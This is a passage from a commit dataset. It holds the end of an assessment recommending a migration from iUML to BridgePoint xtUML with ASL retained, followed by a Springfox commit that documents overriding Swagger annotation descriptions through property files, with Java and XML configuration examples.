resources such as files and directories.\n\nBridgePoint persists its model data as ASCII files on the file system\n(presently in an SQL syntax). A model is logically and semantically\nsubdivided into Eclipse projects and UML _packages_. This partitioning\nallows models to be version-controlled in a scalable fashion that enables\nteams of engineers to work in parallel at the domain level, class diagram\nlevel or at the level of individual classes and state machines.\n\nNote that since BridgePoint persists model data as ASCII files in an open,\naccessible and documented format, users have the option of performing\nconfiguration management idependently from the BridgePoint tool.\nIn such a situation no dependencies on Eclipse, TEAM and\/or BridgePoint\nexist. It is comforting to undertand that user data is wide open and\ncan be managed in the way best suited to existing source code management\nprocedures.\n\nThe Eclipse TEAM API is accessed naturally while editing model elements\nwithin the model hierarchy. Checking out and checking in models are\naccomplished in a manner consistent with other forms of source code.\n\n=== WACA Model Compiler Migration\nWACA represents valuable intellectual property (IP). It embodies the\nsoftware architecture. Rules of translation from Shlaer-Mellor platform\nindependent models (PIMs) are manifest as a separate concern. WACA contains\nno application-specific information; it is platform specific. Multiple\napplications are translated with this model compiler.\n\nModel-based model compilation technology is advancing. Model-based model\ncompilers are more portable and can be developed to generate code faster\nthan previous approaches. WACA follows the traditional interpreted\narchetype approach to code generation. Effort to convert it to newer\napproaches would take time and require access to the architecture source.\n\n== Conclusions and Recommendations\n\nAs stated in <<Introduction and Background>>, there are significant\nchallenges to face. However, this project has the advantage of following\nafter project Raven [<<dr-3,2.3>>] which shared a similar set of requirements\nand produced tooling that can be leveraged to a significant extent.\nThe Raven project spanned roughly two calendar years with varying degrees\nof engineering and engagement during that time. A larger quantity of\nmodel data needed to be migrated. There was no room for flaws in the\nmigration process; 100% integrity needed to be achieved. The requirements\non editing the models was similar to the present project. A model\ncompiler tool chain was to be preserved; this was accomplished.\n\nThe fundamental conclusion is that a migration from iUML with ASL activities\nonto BridgePoint with ASL activities is feasible. The cost in terms of\nengineering effort will be significantly lower based on work already done\nin Raven and during this Assessment.\n\nThe recommendation of One Fact is to proceed with a migration and retain\nASL as the action language during the migration.\n\nMASL should be considered as an alternate action language at some point\nafter a migration. But at the present time, reasons to switch are not\ncompelling.\n\nThe following sections will highlight conclusions and recommendations\nitem by item. These sections are not intended to replace Software\nRequirements Specifications, project plans, and Statemens of Work.\nThese sections simply summarize the results of the Assessment and\ncommunicate a high level overview of recommended Next Steps.\nSizings, resource allocation and time schedules will be more accurately\nprovided in project documentation should such projects be commissioned.\n\n=== Action Language\nThis analysis concludes that a migration staying with ASL is a best first\nstep even if a migration to MASL (next choice) is desired in the future.\nWe recommend that ASL be used as the action language for the immediate\nfuture. We recommend that MASL be considered after a successful migration\nof existing models.\n\n. Stay with ASL until the tool migration is complete.\n. Consider MASL as a long term strategy.\n\n=== ASL Editor\n. Add keyword highlighting in the first version of the ASL activity editor.\nThis will avoid a sense of \"stepping backwards\" from the iUML activity editor.\n. Add auto-indentation; it is a relatively low effort for a nice feature.\n. Plan for real-time name validation and context-sensitive assistance.\n. At a later time, consider the cost\/benefit of rename\/refactor.\n\nMost of this work is best done by the BridgePoint engineering team.\nHowever, it may be a consideration to explore porting the iUML simulator\nto parse ASL activities to vet out syntax errors before compilation.\n\n=== WASL2MASL\n- This will be valuable if a migration to MASL is decided upon in the\nfuture. It is of no value otherwise.\n\n=== WASL2xtUML\n- This is core. Perform this task in the first phase of development.\n- Provide a command line interface to the conversion to support automation.\n- Retain the BridgePoint engineering team for this work.\n\n=== xtUML2WASL\n- This is core. Perform this task in the first phase of development.\n- Obtain capability from within BridgePoint and from the command line.\n- Retain the BridgePoint engineering team for this work.\n\n=== File Formats\n- Using the documented file formats, build a parser to consume these files\nas part of WASL2xtUML conversion.\n\n=== Conversion Integrity and WASL Round Trip\n- In order to satisfy the need for high integrity in the conversion of\nWASL to xtUML and xtUML to WASL, employ the round-trip strategy to achieve\na high degree of confidence in the conversion. This also reduces risk of\nwasted graphical editing effort on models that need to be reconverted.\n- The tooling for this work is best done by the BridgePoint engineering\nteam. Running the scripts locally is best done by a local engineer with\naccess to the model data.\n\n=== Diagram Editing\n1. Be certain model conversion is sound before performing manual diagram\nrearrangement.\n2. Consider rearranging diagram layouts as needed. There may be little\nreason to lay out a diagram that is not being viewed on a regular basis.\n3. Employ `Oblique` and `Rectilinear` routing strategies during layout.\n4. Employ your own engineering talent for this work due to security\nclearance requirements.\n\n=== xtUML and BridgePoint Training\nIt is important to ramp up tooling knowledge within the organization.\nThis means that knowledge transfer begins with a few and increases to\nmore, and that expertise exists heavily in a few and lightly in many.\nThere is a continuum of tooling and methodology expertise that is at\nits peak (capability and cost) outside the company with consultants\nand then high with a few people inside the shop and then adequate with\neveryone else using the tool.\n\nTo achieve this balance a plan must be established. Following are\nrecommendations to be incorporated into the training plan.\n\n. Designate one or two internal champions now.\n. Begin training up the local champion during the Assessment and through\nthe first phase of the model\/tool migration projects.\n. Use a combination of online resources and on-site training.\n. Have a few engineers work through the online training materials.\n. Designate a primary contact to the BridgePoint team and to the xtUML\nCommunity including access to BridgePoint issue trackers and configuration\nmanagement repositories.\n. Schedule the _Basic xtUML Modeling_ course for the champion and a few\nearly adopters.\n. Plan to push training deeper into the organization as modeling projects\nroll out.\n\n=== Configuration Management\n. Adopt a configuration management strategy that is compatible with the\nversion control of other source artifacts in your organization (probably\nClearCASE).\n. Spend time practicing configuration management of BridgePoint xtUML models.\n - create a branch\n - check-out\n - check-in\n - merge branches\n - resolve a conflict\n\n=== Model Compiler Migration\nAt this point, WACA should be preserved and reused. Migration away from\nWACA should be considered only after a successful migration of iUML\napplication models into new tooling.\n\n. Protect and preserve the IP of the WACA model compiler.\n. Consider options for improving the throughput and maintainability of WACA\nafter initial model migration has settled.\n. Consider placing WACA into the public domain at some point in the future.\nThis may result in community engagement and additional resources maintaining\nthe architecture.\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"698e13dd181103f6e03f54a8101f954c8699dc7b","subject":"Added documentation on externalizing descriptions to properties","message":"Added documentation on externalizing descriptions to properties\n\nresolves #1232\n","repos":"springfox\/springfox,springfox\/springfox,springfox\/springfox,springfox\/springfox","old_file":"docs\/asciidoc\/current-documentation.adoc","new_file":"docs\/asciidoc\/current-documentation.adoc","new_contents":"== Configuring Springfox\n\n:releaseVersion: {springfox-released-version}\n:snapshotVersion: {springfox-current-version}\n\nTo enable support for swagger specification 1.2 use the ```@EnableSwagger``` annotation\n\nTo enable support for swagger specification 2.0 use the ```@EnableSwagger2``` annotation\n\nTo document the service we use a ```Docket```. This is changed to be more inline with the fact that expressing the\ncontents of the documentation is agnostic of the format the documentation is rendered.\n\nDocket https:\/\/www.wordnik.com\/words\/docket[stands for] *A summary or other brief statement of the contents of a\ndocument; an abstract.*\n\n`Docket` helps configure a subset of the services to be documented and groups them by name. Significant changes\nto this is the ability to provide an expressive predicate based for api selection.\n\n```java\n import static springfox.documentation.builders.PathSelectors.*;\n import static com.google.common.base.Predicates.*;\n\n @Bean\n public Docket swaggerSpringMvcPlugin() {\n return new Docket(DocumentationType.SWAGGER_2)\n .groupName(\"business-api\")\n .select()\n \/\/Ignores controllers annotated with @CustomIgnore\n .apis(not(withClassAnnotation(CustomIgnore.class)) \/\/Selection by RequestHandler\n .paths(paths()) \/\/ and by paths\n .build()\n .apiInfo(apiInfo())\n .securitySchemes(securitySchemes())\n .securityContext(securityContext());\n }\n\n \/\/Here is an example where we select any api that matches one of these paths\n private Predicate<String> paths() {\n return or(\n regex(\"\/business.*\"),\n regex(\"\/some.*\"),\n regex(\"\/contacts.*\"),\n regex(\"\/pet.*\"),\n regex(\"\/springsRestController.*\"),\n regex(\"\/test.*\"));\n }\n\n```\n\nFor a list of handy predicates Look at https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/RequestHandlerSelectors.java[RequestHandlerSelectors]\nand https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/PathSelectors.java[PathSelectors].\n\n=== Configuring the ObjectMapper\n\nA simple way to configure the object mapper is to listen for the ```ObjectMapperConfigured``` event. Regardless of\nwhether there is a customized ObjectMapper in play with a corresponding MappingJackson2HttpMessageConverter, the\nlibrary always has a configured ObjectMapper that is customized to serialize swagger 1.2 and swagger 2.0 types.\n\nIn order to do this implement the ```ApplicationListener<ObjectMapperConfigured>``` interface. The event has a handle\n to the ObjectMapper that was configured. Configuring application specific ObjectMapper customizations in this\n application event handler guarantees that application specific customizations will be applied to each and every\n ObjectMapper that is in play.\n\nIf you encounter a NullPointerException during application startup like https:\/\/github.com\/springfox\/springfox\/issues\/635[this issue]. Its because most likely the ```WebMvcConfigurerAdapter``` isn't working.\nThese adapter especially in a non-spring-boot scenarios will only get loaded if the @EnableWebMvc\nhttp:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/web\/servlet\/config\/annotation\/WebMvcConfigurer.html[annotation is present].\n\nIf using Spring Boot Web MVC, there is no need to use the @EnableWebMvc annotation, as the framework automatically detects Web MVC usage and configures itself as appropriate.\nIn this scenario, Springfox will not correctly generate and expose the Swagger UI endpoint (`\/swagger-ui.html`) if @EnableWebMvc is present in the application.\n\nCaveat to using the library is that it depends on Jackson for serialization, more importantly the `ObjectMapper`. A\ngood example of where this breaks down is the following http:\/\/stackoverflow.com\/a\/30220562\/19219[issue when using Gson serialization]\n\n=== Customizing the swagger endpoints.\n\nBy default the swagger service descriptions are generated at the following urls\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Documentation Url | Group\n|1.2 | \/api-docs | implicit *default* group\n|1.2 | \/api-docs?group=external | *external* group via docket.groupName()\n|2.0 | \/v2\/api-docs | implicit *default* group\n|2.0 | \/v2\/api-docs?group=external | *external* group via docket.groupName()\n|=======================\n\nTo customize these endpoints, loading a http:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/context\/annotation\/PropertySource.html[property source] with the following properties\nallows the properties to be overridden\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Override property\n|1.2 | springfox.documentation.swagger.v1.path\n|2.0 | springfox.documentation.swagger.v2.path\n|=======================\n\n=== Configuring startup.\nIf you'd like to delay the startup of springfox, you could choose to set auto-startup to false. The property to use\nis `springfox.documentation.auto-startup` and this could either be passed in as a `-D` jvm arg or via a property in\n`application.yml\/properties` file.\n[options=\"header,footer\"]\n|=======================\n|Override property | description\n| true | This is the default value, which starts scanning for endpoints automatically when\nthe spring contexts is refreshed.\n| false | This setting starts scanning for endpoints only when when the `Lifecycle#start()` method is called explicitly.\nThis is very useful for frameworks like grails that has its own lifecycle. It indicates that the library\nuser is responsible for starting the `DocumentationPluginsBootStrapper` lifecycle.\n|=======================\n\nWARNING: Change this default to `false` with caution. This implies managing the startup of the plugins prior to\nrequesting the swagger endpoints in a thread-safe manner.\n\n=== Overriding descriptions via properties\nAdded support for resolving properties in property sources to replace expressions in certain annotations. In order to\n use it simply define properties in `application.properties`, `application.yml` file or property files in your\n classpath with values that you'd like to see replaced in known annotations. For e.g. `@ApiModelProperty(value=\"${property1.description}\")`\n will evaluate `property1.description` from the available properties. If none is found, it will render the\n un-resolved expression as-is.\n\nCurrently supported list of annotations are in order of priority within the annotation:\n\n[options=\"header,footer\"]\n|=======================\n|Annotation | attribute | target property| description\n| ApiModelProperty | value | ModelProperty#description |e.g. `@ApiModelProperty(value=\"${property1.description}\")`\n| ApiModelProperty | description | ModelProperty#description |e.g. `@ApiModelProperty(notes=\"${property1.description}\")`\n| ApiParam | value | Parameter#description |e.g. `@ApiParam(value=\"${param1.description}\")`\n| ApiImplicitParam | value | Parameter#description |e.g. `@ApiImplicitParam(value=\"${param1.description}\")`\n| ApiOperation | notes | Operation#notes |e.g. `@ApiOperation(notes=\"${operation1.description}\")`\n| ApiOperation | summary | Operation#summary |e.g. `@ApiOperation(value=\"${operation1.summary}\")`\n| RequestParam | defaultValue | Parameter#defaultValue |e.g. `@RequestParam(defaultValue=\"${param1.defaultValue}\")`\n| RequestHeader | defaultValue | Parameter#defaultValue |e.g. `@RequestHeader(defaultValue=\"${param1.defaultValue}\")`\n|=======================\n\n=== Overriding property datatypes\n\nUsing the `ApiModelProperty#dataType` we can override the inferred data types. However it is restricted\n to only allow data types to be specified with a fully qualified class name. For e.g. if we have the following\n definition\n\n[source,java,linenums]\n----\n\n\/\/ if com.qualified.ReplaceWith is not a Class that can be created using Class.forName(...)\n\/\/ Original will be replaced with the new class\n@ApiModelProperty(dataType = \"com.qualified.ReplacedWith\")\npublic Original getOriginal() { ... }\n\n\/\/ if ReplaceWith is not a Class that can be created using Class.forName(...) Original will be preserved\n@ApiModelProperty(dataType = \"ReplaceWith\")\npublic Original getAnotherOriginal() { ... }\n\n----\n\nNOTE: In the case of `ApiImplicitParam#dataType`, since the type itself is usually a scalar type (string, int)\nuse one of the base types specified in the Types class =>\n`springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java`\n\n[source,groovy,linenums]\n----\ninclude::..\/..\/springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java[lines=42..55]\n----\n\n\n=== Docket XML Configuration\n\nTo use the plugin you must create a spring java configuration class which uses spring's `@Configuration`.\nThis config class must then be defined in your xml application context.\n\n\n```xml\n<!-- Required so springfox can access spring's RequestMappingHandlerMapping -->\n<mvc:annotation-driven\/>\n\n<!-- Required to enable Spring post processing on @Configuration classes. -->\n<context:annotation-config\/>\n\n<bean class=\"com.yourapp.configuration.MySwaggerConfig\"\/>\n```\n\n```java\n\n@Configuration\n@EnableSwagger \/\/Loads the spring beans required by the framework\npublic class MySwaggerConfig {\n\n \/**\n * Every Docket bean is picked up by the swagger-mvc framework - allowing for multiple\n * swagger groups i.e. same code base multiple swagger resource listings.\n *\/\n @Bean\n public Docket customDocket(){\n return new Docket(); \/\/some customization goes here\n }\n\n}\n```\n\n\n=== Docket Spring Java Configuration\n\n- Use the `@EnableSwagger` or `@EnableSwagger2` annotation.\n- Define one or more Docket instances using springs `@Bean` annotation.\n\n```java\n@Configuration\n@EnableWebMvc \/\/NOTE: Only needed in a non-springboot application\n@EnableSwagger2\n@ComponentScan(\"com.myapp.controllers\")\npublic class CustomJavaPluginConfig {\n\n\n @Bean \/\/Don't forget the @Bean annotation\n public Docket customImplementation(){\n return new Docket()\n .apiInfo(apiInfo());\n \/\/... more options available\n\n }\n\n \/\/...\n}\n```\n\n=== Support for documentation from property file lookup\n\nStarting with `2.7.0` we support looking up description from the following annotations given a property just like\nproperty place holders resolve a value annotation `@Value(${key})`. The following annotations attributes support\ndescription resolution.\n\n- `@ApiParam#value()`\n- `@ApiImplicitParam#value()`\n- `@ApiModelProperty#value()`\n- `@ApiOperation#value()`\n- `@ApiOperation#notes()`\n- `@RequestParam#defaultValue()`\n- `@RequestHeader#defaultValue()`\n\nBelow are examples of how it would work\n\n[[controller-description]]Controller Example\n[source,java]\n.SomeController.java\n----\n\n @ApiOperation(value = \"Find pet by Status\",\n notes = \"${SomeController.findPetsByStatus.notes}\"...) \/\/<1>\n @RequestMapping(value = \"\/findByStatus\", method = RequestMethod.GET, params = {\"status\"})\n public Pet findPetsByStatus(\n @ApiParam(value = \"${SomeController.findPetsByStatus.status}\", \/\/<2>\n required = true,...)\n @RequestParam(\"status\",\n defaultValue=\"${SomeController.findPetsByStatus.status.default}\") String status) { \/\/<3>\n \/\/...\n }\n\n @ApiOperation(notes = \"Operation 2\", value = \"${SomeController.operation2.value}\"...) \/\/<4>\n @ApiImplicitParams(\n @ApiImplicitParam(name=\"header1\", value=\"${SomeController.operation2.header1}\", ...) \/\/<5>\n )\n @RequestMapping(value = \"operation2\", method = RequestMethod.POST)\n public ResponseEntity<String> operation2() {\n return ResponseEntity.ok(\"\");\n }\n----\n\n<1> Example of `@ApiOperation#notes()`\n<2> Example of `@ApiParam#value()\n<3> Example of `@RequestParam#defaultValue()`\n<4> Example of `@ApiOperation#value()`\n<5> Example of `@ApiImplicitParams#value()`\n\n[[model-description]]Model Example\n\n[source,java]\n.SomeModel.java\n----\n public class SomeModel {\n @ApiModelProperty(value = \"${SomeModel.someProperty}\", ...) \/\/<1>\n private long someProperty;\n }\n----\n\n<1> Example of `@ApiModelProperty#value()`\n\nTo provide these properties via external properties just add it to your application property file or any property\nsource configured by the application as shown below. When a property place holder cannot be found the default\nbehavior is to echo the expression as-is.\n\n[source,properties]\n.application.properties\n----\nSomeController.findPetsByStatus.notes=Finds pets by status\nSomeController.findPetsByStatus.status=Status could be one of ...\nSomeController.operation2.header1=Header for bla bla...\nSomeController.operation2.value=Operation 2 do something...\nSomeModel.someProperty=Some property description\n----\n\n==== Swagger group\n\nA swagger group is a concept introduced by this library which is simply a unique identifier for a Swagger Resource Listing\nwithin your application. The reason this concept was introduced was to support applications which require more than one\nResource Listing. Why would you need more than one Resource Listing?\n- A single Spring Web MVC application serves more than one API e.g. publicly facing and internally facing.\n- A single Spring Web MVC application serves multiple versions of the same API. e.g. v1 and v2\n\nIn most cases an application will not need more than one Resource Listing and the concept of swagger groups can be ignored.\n\n==== Configuring the output of _operationId_ in a Swagger 2.0 spec\n\nAs defined https:\/\/github.com\/swagger-api\/swagger-spec\/blob\/master\/versions\/2.0.md#fixed-fields-5[`operationId` was\nintroduced] in the Swagger 2.0 spec, the `operationId` parameter, which was referred to as `nickname` in pre-2.0\nversions of the Swagger spec, provides the author a means by which to describe an API operation with a friendly name\n. This field is often used by consumers of a Swagger 2.0 spec in order to name functions in generated clients. An\nexample of this can be seen in the https:\/\/github.com\/swagger-api\/swagger-codegen[swagger-codegen project].\n\n===== The default value of `operationId` according to Springfox\n\nBy default, when using Springfox in Swagger 2.0 mode, the value of `operationID` will be rendered using the\nfollowing structure: \"`[java_method_name_here]Using[HTTP_verb_here]`\". For example, if one has a method `getPets()`\nconnected to an HTTP GET verb, Springfox will render `getPetsUsingGET` for the operationId.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== the default `operationId` will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getAllThePetsUsingGET\"\n ...\n }\n }\n}\n\n```\n\n===== Customizing the value of _operationId_\n\nIn the event you wish to override the default `operationId` which Springfox renders, you may do so by providing the\n`nickname` element in an `@ApiOperation` annotation.\n\n====== Given this annotated method ...\n\n```java\n@ApiOperation(value = \"\", nickname = \"getMeAllThePetsPlease\")\n@RequestMapping(value = \"\/pets\", method = RequestMethod.GET)\npublic Model getAllThePets() {\n ...\n}\n```\n\n====== ... the customized *operationId* will render looking like this:\n\n```json\n\n\"paths\": {\n \"\/pets\": {\n \"get\": {\n ...\n \"operationId\":\"getMeAllThePetsPlease\"\n ...\n }\n }\n}\n\n```\n\n==== Changing how Generic Types are Named\n\nBy default, types with generics will be labeled with '\\u00ab'(<<), '\\u00bb'(>>), and commas. This can be problematic\nwith things like swagger-codegen. You can override this behavior by implementing your own `GenericTypeNamingStrategy`.\nFor example, if you wanted `List<String>` to be encoded as 'ListOfString' and `Map<String, Object>`\nto be encoded as 'MapOfStringAndObject' you could set the `forCodeGeneration` customization option to `true` during\nplugin customization:\n\n```java\n docket.forCodeGeneration(true|false);\n```\n\n=== Caching\n\nThe caching feature that was introduced in 2.1.0 has been removed. Springfox no longer uses the cache abstraction to\nimprove performance the api scanners and readers. It has been rolled into the library as an internal implementation\ndetail as of 2.1.2. This is a runtime breaking change, however, since its not really breaking api compatibility change\nother than the introduction of configuration change in consuming applications, we're not incrementing the minor version.\n\n=== Configuring Security Schemes and Contexts an Overview\n\nThe security provisions in SpringFox at a high level, without getting into the code, has different pieces\nthat all work together in concert\n\n- The API itself needs to be protected. This is achieved by using, for simplicity sake, spring security and may also\nuse a combination of servlet container and tomcat\/jersey etc.\n- The security scheme which describes the techniques you've used to protect the api. Spring fox supports whatever\nschemes swagger specification supports (ApiKey, BasicAuth and OAuth2 (certain profiles))\n- Finally the security contexts which actually provides information on which api's are protected by which schemes. I\nthink in your example, you're missing the last piece of the puzzle, the security context see xref:getting-started-spring-boot[15].\n\n=== Example application\n\nFor an examples for spring-boot, vanilla spring applications take a look https:\/\/github.com\/springfox\/springfox-demos[examples]\nin the demo application.\n\n== Configuring springfox-staticdocs\n\nIMPORTANT: Support for this module has been deprecated in 2.7.0. Since swagger2markup doesnt support jdk6 anymore it is\ndifficult for build to co-exist with the newer version of swagger2markup. Please use the\n_latest_ instructions provided in the awesome https:\/\/github.com\/Swagger2Markup\/swagger2markup[Swagger2Markup Library].\n\n== Security\n\nThanks to https:\/\/github.com\/mojaiq[Javed Mohammed] we now have an example https:\/\/github.com\/springfox\/springfox-oath2-demo[oauth demo].\n\nNOTE: this is based on swagger-ui pre 3.x\n\n","old_contents":"== Configuring Springfox\n\n:releaseVersion: {springfox-released-version}\n:snapshotVersion: {springfox-current-version}\n\nTo enable support for swagger specification 1.2 use the ```@EnableSwagger``` annotation\n\nTo enable support for swagger specification 2.0 use the ```@EnableSwagger2``` annotation\n\nTo document the service we use a ```Docket```. This is changed to be more inline with the fact that expressing the\ncontents of the documentation is agnostic of the format the documentation is rendered.\n\nDocket https:\/\/www.wordnik.com\/words\/docket[stands for] *A summary or other brief statement of the contents of a\ndocument; an abstract.*\n\n`Docket` helps configure a subset of the services to be documented and groups them by name. Significant changes\nto this is the ability to provide an expressive predicate based for api selection.\n\n```java\n import static springfox.documentation.builders.PathSelectors.*;\n import static com.google.common.base.Predicates.*;\n\n @Bean\n public Docket swaggerSpringMvcPlugin() {\n return new Docket(DocumentationType.SWAGGER_2)\n .groupName(\"business-api\")\n .select()\n \/\/Ignores controllers annotated with @CustomIgnore\n .apis(not(withClassAnnotation(CustomIgnore.class)) \/\/Selection by RequestHandler\n .paths(paths()) \/\/ and by paths\n .build()\n .apiInfo(apiInfo())\n .securitySchemes(securitySchemes())\n .securityContext(securityContext());\n }\n\n \/\/Here is an example where we select any api that matches one of these paths\n private Predicate<String> paths() {\n return or(\n regex(\"\/business.*\"),\n regex(\"\/some.*\"),\n regex(\"\/contacts.*\"),\n regex(\"\/pet.*\"),\n regex(\"\/springsRestController.*\"),\n regex(\"\/test.*\"));\n }\n\n```\n\nFor a list of handy predicates Look at https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/RequestHandlerSelectors.java[RequestHandlerSelectors]\nand https:\/\/github.com\/springfox\/springfox\/blob\/master\/springfox-core\/src\/main\/java\/springfox\/documentation\/builders\/PathSelectors.java[PathSelectors].\n\n=== Configuring the ObjectMapper\n\nA simple way to configure the object mapper is to listen for the ```ObjectMapperConfigured``` event. Regardless of\nwhether there is a customized ObjectMapper in play with a corresponding MappingJackson2HttpMessageConverter, the\nlibrary always has a configured ObjectMapper that is customized to serialize swagger 1.2 and swagger 2.0 types.\n\nIn order to do this implement the ```ApplicationListener<ObjectMapperConfigured>``` interface. The event has a handle\n to the ObjectMapper that was configured. Configuring application specific ObjectMapper customizations in this\n application event handler guarantees that application specific customizations will be applied to each and every\n ObjectMapper that is in play.\n\nIf you encounter a NullPointerException during application startup like https:\/\/github.com\/springfox\/springfox\/issues\/635[this issue]. Its because most likely the ```WebMvcConfigurerAdapter``` isn't working.\nThese adapter especially in a non-spring-boot scenarios will only get loaded if the @EnableWebMvc\nhttp:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/web\/servlet\/config\/annotation\/WebMvcConfigurer.html[annotation is present].\n\nIf using Spring Boot Web MVC, there is no need to use the @EnableWebMvc annotation, as the framework automatically detects Web MVC usage and configures itself as appropriate.\nIn this scenario, Springfox will not correctly generate and expose the Swagger UI endpoint (`\/swagger-ui.html`) if @EnableWebMvc is present in the application.\n\nCaveat to using the library is that it depends on Jackson for serialization, more importantly the `ObjectMapper`. A\ngood example of where this breaks down is the following http:\/\/stackoverflow.com\/a\/30220562\/19219[issue when using Gson serialization]\n\n=== Customizing the swagger endpoints.\n\nBy default the swagger service descriptions are generated at the following urls\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Documentation Url | Group\n|1.2 | \/api-docs | implicit *default* group\n|1.2 | \/api-docs?group=external | *external* group via docket.groupName()\n|2.0 | \/v2\/api-docs | implicit *default* group\n|2.0 | \/v2\/api-docs?group=external | *external* group via docket.groupName()\n|=======================\n\nTo customize these endpoints, loading a http:\/\/docs.spring.io\/spring\/docs\/current\/javadoc-api\/org\/springframework\/context\/annotation\/PropertySource.html[property source] with the following properties\nallows the properties to be overridden\n\n[options=\"header,footer\"]\n|=======================\n|Swagger version | Override property\n|1.2 | springfox.documentation.swagger.v1.path\n|2.0 | springfox.documentation.swagger.v2.path\n|=======================\n\n=== Configuring startup.\nIf you'd like to delay the startup of springfox, you could choose to set auto-startup to false. The property to use\nis `springfox.documentation.auto-startup` and this could either be passed in as a `-D` jvm arg or via a property in\n`application.yml\/properties` file.\n[options=\"header,footer\"]\n|=======================\n|Override property | description\n| true | This is the default value, which starts scanning for endpoints automatically when\nthe spring contexts is refreshed.\n| false | This setting starts scanning for endpoints only when when the `Lifecycle#start()` method is called explicitly.\nThis is very useful for frameworks like grails that has its own lifecycle. It indicates that the library\nuser is responsible for starting the `DocumentationPluginsBootStrapper` lifecycle.\n|=======================\n\nWARNING: Change this default to `false` with caution. This implies managing the startup of the plugins prior to\nrequesting the swagger endpoints in a thread-safe manner.\n\n=== Overriding property datatypes\n\nUsing the `ApiModelProperty#dataType` we can override the inferred data types. However it is restricted\n to only allow data types to be specified with a fully qualified class name. For e.g. if we have the following\n definition\n\n[source,java,linenums]\n----\n\n\/\/ if com.qualified.ReplaceWith is not a Class that can be created using Class.forName(...)\n\/\/ Original will be replaced with the new class\n@ApiModelProperty(dataType = \"com.qualified.ReplacedWith\")\npublic Original getOriginal() { ... }\n\n\/\/ if ReplaceWith is not a Class that can be created using Class.forName(...) Original will be preserved\n@ApiModelProperty(dataType = \"ReplaceWith\")\npublic Original getAnotherOriginal() { ... }\n\n----\n\nNOTE: In the case of `ApiImplicitParam#dataType`, since the type itself is usually a scalar type (string, int)\nuse one of the base types specified in the Types class =>\n`springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java`\n\n[source,groovy,linenums]\n----\ninclude::..\/..\/springfox-schema\/src\/main\/java\/springfox\/documentation\/schema\/Types.java[lines=42..55]\n----\n\n\n=== Docket XML Configuration\n\nTo use the plugin you must create a spring java configuration class which uses spring's `@Configuration`.\nThis config class must then be defined in your xml application context.\n\n\n```xml\n<!-- Required so springfox can access spring's RequestMappingHandlerMapping -->\n<mvc:annotation-driven\/>\n\n<!-- Required to enable Spring post processing on @Configuration classes. -->\n<context:annotation-config\/>\n\n<bean class=\"com.yourapp.configuration.MySwaggerConfig\"\/>\n```\n\n```java\n\n@Configuration\n@EnableSwagger \/\/Loads the spring beans required by the framework\npublic class MySwaggerConfig {\n\n \/**\n * Every Docket bean is picked up by the swagger-mvc framework - allowing for multiple\n * swagger groups i.e. same code base multiple swagger resource listings.\n *\/\n @Bean\n public Docket customDocket(){\n return new Docket(); \/\/some customization goes here\n }\n\n}\n```\n\n\n=== Docket Spring Java Configuration\n\n- Use the `@EnableSwagger` or `@EnableSwagger2` annotation.\n- Define one or more Docket instances using springs `@Bean` annotation.\n\n```java\n@Configuration\n@EnableWebMvc \/\/NOTE: Only needed in a non-springboot application\n@EnableSwagger2\n@ComponentScan(\"com.myapp.controllers\")\npublic class CustomJavaPluginConfig {\n\n\n @Bean \/\/Don't forget the @Bean annotation\n public Docket customImplementation(){\n return new Docket()\n .apiInfo(apiInfo());\n \/\/... more options available\n\n }\n\n \/\/...\n}\n```\n\n=== Support for documentation from property file lookup\n\nStarting with `2.7.0` we support looking up description from the following annotations given a property just like\nproperty place holders resolve a value annotation `@Value(${key})`. The following annotations attributes support\ndescription resolution.\n\n- `@ApiParam#value()`\n- `@ApiImplicitParam#value()`\n- `@ApiModelProperty#value()`\n- `@ApiOperation#value()`\n- `@ApiOperation#notes()`\n- `@RequestParam#defaultValue()`\n- `@RequestHeader#defaultValue()`\n\nBelow are examples of how it would work\n\n[[controller-description]]Controller Example\n[source,java]\n.SomeController.java\n----\n\n @ApiOperation(value = \"Find pet by Status\",\n notes = \"${SomeController.findPetsByStatus.notes}\"...) \/\/<1>\n @RequestMapping(value = \"\/findByStatus\", method = RequestMethod.GET, params = {\"status\"})\n public Pet findPetsByStatus(\n @ApiParam(value = \"${SomeController.findPetsByStatus.status}\", \/\/<2>\n required = true,...)\n @RequestParam(\"status\",\n defaultValue=\"${SomeController.findPetsByStatus.status.default}\") String status) { \/\/<3>\n \/\/...\n }\n\n @ApiOperation(notes = \"Operation 2\", value = \"${SomeController.operation2.value}\"...) \/\/<4>\n @ApiImplicitParams(\n @ApiImplicitParam(name=\"header1\", value=\"${SomeController.operation2.header1}\", ...) \/\/<5>\n )\n @RequestMapping(value = \"operation2\", method = RequestMethod.POST)\n public ResponseEntity<String> operation2() {\n return ResponseEntity.ok(\"\");\n }\n----\n\n<1> Example of `@ApiOperation#notes()`\n<2> Example of `@ApiParam#value()\n<3> Example of `@RequestParam#defaultValue()`\n<4> Example of `@ApiOperation#value()`\n<5> Example of `@ApiImplicitParams#value()`\n\n[[model-description]]Model Example\n\n[source,java]\n.SomeModel.java\n----\n public class SomeModel {\n @ApiModelProperty(value = \"${SomeModel.someProperty}\", ...) \/\/<1>\n private long someProperty;\n }\n----\n\n<1> Example of `@ApiModelProperty#value()`\n\nTo provide these properties via external properties just add it to your application property file or any property\nsource configured by the application as shown below. When a property place holder cannot be found the default\nbehavior is 